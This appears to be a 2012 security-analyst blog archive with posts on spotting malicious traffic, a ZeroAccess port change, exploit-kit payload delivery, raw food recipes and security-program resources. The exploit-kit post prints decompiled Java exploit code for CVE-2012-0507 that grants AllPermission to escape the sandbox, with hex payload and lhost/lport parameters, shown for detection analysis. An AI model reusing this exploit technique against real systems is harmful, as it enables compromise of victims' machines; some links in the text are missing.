Artifacts of a Malicious Traffic

October 18, 2012 Leave a comment

While Investigating the Suspicious Traffic, it is important for an analyst to be clear what is really suspicious or not.
Below are few artifacts an analyst can observe to conclude if it is malicious or not.


1)      IP belong to High Risk Hosting Provider / Internet User IP

2)      Has Malicious References on sites such as,,,,,,, etc.,



If at least three of below criteria is matched, the domain would be malicious

1)      Domain is NOT Popular

2)      Has Malicious References on sites such as,,,,,,, etc.,

3)      Domain created date is less than 1 Year

4)      Bluecoat Category is none / Suspicious / Malicious sources / Malicious Botnets / Dynamic DNS Hosts

5)      No Site description




1)      User-Agent Field gives the idea what Is the application

Some malwares uses UA that appears legitimate, Hence check the UA used in other traffic for that IP at the same time

Some Malware uses exact UA that browser on infected machine uses, In that case check the header for other fields as described below to confirm if the web request is made by Browser/Malware.

2)  Below fields in the Header indicate the request is made by a browser .

If they are not present, mostly the request is made by some malware/application


 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip, deflate

Cache-Control: max-stale=0

Pragma: no-cache

Connection: Keep-Alive

3)      Referrer Field gives the Clue from where the user was redirected to

After confirming that Web Request is made by Browser,

If Referrer field is available,

a)      If Referrer URL is – indicating user infected from Phishing/SPAM

b)      If Referrer URL is good blog/forum – indicating user infected from compromised site

If Referrer field is unavailable – User might have been Phished/SPAMed . (User clicking link from email in outlook)


Callback IP List – 16/8/2012

August 16, 2012 Leave a comment

Categories: Uncategorized Tags:

ZeroAccess/Siresef Update

August 6, 2012 Leave a comment

Until last week ZeroAccess/Siresef Infected hosts contacting C&C domain on ports 16464, 16465, 16470 and 16471.
Currently it switched to port 34354 is now going on wild.

Watch out your network for machines going on to internet ips on this port

Categories: Uncategorized Tags:

New Mode of delivering Malware Payload by Exploit Kits

July 19, 2012 Leave a comment

Huh… Exploit writers have come up with new mode of delivering malware payload.

The current pattern of exploit kit is malicious webpage -> Exploit (Java/PDF/others) -> Exploits download the malicious executable.
we have devised appropriate signatures for these patterns, malware authors has come up with new mode of delivering malware payload.

They are embedding malware payload as HEX in the malicious webpage and passing it as a parameter to the exploit.
The exploit bypasses security controls and writes the HEX as the file and runs on the victim system.

Malicious Webpage that triggering Exploit Applet, The param, converted to binary and XOR’d with 0x77, retunes an EXE

<param name="data" value="3A2DE777747777777377777788887777CF777777777777773777777…

Code that reads the Malware Payload Content

            ConfusingClassLoader confusingclassloader = confuser.confuse(getClass().getClassLoader());
            String as[] = {
                "", "$pr"
            String as1[] = {
                "/m/y/py.class", "/m/y/py$pr.class"
            String s = getParameter("lport");
            ConfusingClassLoader.defineAndCreate(confusingclassloader, as, new byte[][] {
                loadClass(as1[0]), loadClass(as1[1])
            }, getParameter("data"), getParameter("jar"), getParameter("lhost"), s != null ? Integer.parseInt(s) : 4444);

Exploit code (Java/CVE-2012-0507) that bypasses security restrictions

public static void defineAndCreate(ConfusingClassLoader confusingclassloader, String as[], byte abyte0[][], String s, String s1, String s2, int i)

Permissions permissions = new Permissions();
permissions.add(new AllPermission());
ProtectionDomain protectiondomain = new ProtectionDomain(new CodeSource(null, new Certificate[0]), permissions);
Class class1 = confusingclassloader.defineClass(as[0], abyte0[0], 0, abyte0[0].length, protectiondomain);
confusingclassloader.defineClass(as[1], abyte0[1], 0, abyte0[1].length, protectiondomain);
Field field = class1.getField("data");
Field field1 = class1.getField("jar");
Field field2 = class1.getField("lhost");
Field field3 = class1.getField("lport");
field.set(null, s);
field1.set(null, s1);
field2.set(null, s2);
field3.set(null, Integer.valueOf(i));

Code that writes the content to file

                bufferedreader = new BufferedReader(new InputStreamReader(is));
                bufferedwriter = new BufferedWriter(new OutputStreamWriter(os));
                char ac[] = new char[8192];
                int i;
                while((i =, 0, ac.length)) > 0) 
                   bufferedwriter.write(ac, 0, i);

Just scratching my head how to detect it?

Raw Food recipes from Life Regenerator Dan

June 30, 2012 Leave a comment


Notes Compiled by Uma Mahesh

  1. Almond Coconut Yogurt


Mung Bean Salad


Sprouted Mung beans + kottimera + tomato + onions

Salad Dressing

Olive Oil + Orange Juice + Sea Salt

Spicy Cabbage Almond Salad


Cabbage + Almond

Salad Dressing

Apple Cider Vinegar + Honey + Garlic Powder

+ Pandu Mirapakai Karam + Saindhava Lavanam

Seseme tahini

Salad Dips


1 cup Sesame seeds + 4 cloves of garlic + Zucchini +

Dates + Lemon (/Orange) + Water(/Coconut water)


Carrot , Broccoli, Calliflower, any veggie

Coconut Almond Yogurt & Avacado Dressing

Salad Dressing


Basil/kottimera (Any herb) +

Coconut Almond Yogurt +

Dates +Garlic Cloves + Saindava Lavanam)

+ Pandu Mirapa (If required hot)


    Lettuce (Any Leafy Veggie) + Sprouts + Onion + Cucumber

Raw Tacos

Cilantra -> Kottimira

Salad Base (Taco Meat)


    Walnutes + Cumin + Paprika + Sea Salt

Salad Cheese

Sprouted pumpkin seeds + Nutritional Yeast

Gaucamole Salad

Salad Dressing


(Tomatos + Onions + Garlic + Chili + Kottimera)

+ Avacado + Corn


Zucchini slices

Butternut Squash Pasta

Blend (Squash Pasta)

    Tomatos ( + Sun Dried Tomatoes) + Kottimira + Olive oil

+ lemon + garlic + sea salt + oregano + (All Herb Powders)


Gummadikayi noodles (Shredder (gummadikai) )

Mango Dill Jalapeno Dressing

Blend (Dips)

    Mangoes + Mint Leaves + Pachimirapakai


Romaine Lettuce

Butternut Squash Pudding


Pumpkin + Coconot almond yogurt + protein powder + cinnamon

Categories: health Tags: , ,

Business case to convince Management for Security Incident Response center

May 29, 2012 Leave a comment

Today i am reading through mandiant document named ‘Planning for Failure”. It contains real data that emphasizes on breaches and necessity to plan for failure to protect. For any company or security consultancy that real data can be used for business case for getting budget for security. Hence i am including that document here.


This document can also be helpful to CISO to show to management and startup guidelines to initiate building up Incident Response Center.


PCI Compliance Dashboard guiding PCI Compliance journey

May 22, 2012 Leave a comment

A well composed guide for PCI Compliance,
it includes “SANS Top 20 Critical Security Controls” and many others.

It helps giving simple and clear guidelines for ensuring security for any organization irrespective of PCI compliance mandate.

It can be downloaded from